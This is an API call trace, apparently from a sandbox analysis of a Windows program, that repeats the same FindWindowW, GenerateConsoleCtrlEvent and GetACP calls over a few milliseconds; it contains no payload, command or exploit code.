[0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 
[0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, 
dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] 
GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") 
returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, 
lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] 
FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () 
returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 
[0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, 
dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] 
GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") 
returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, 
lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] 
FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 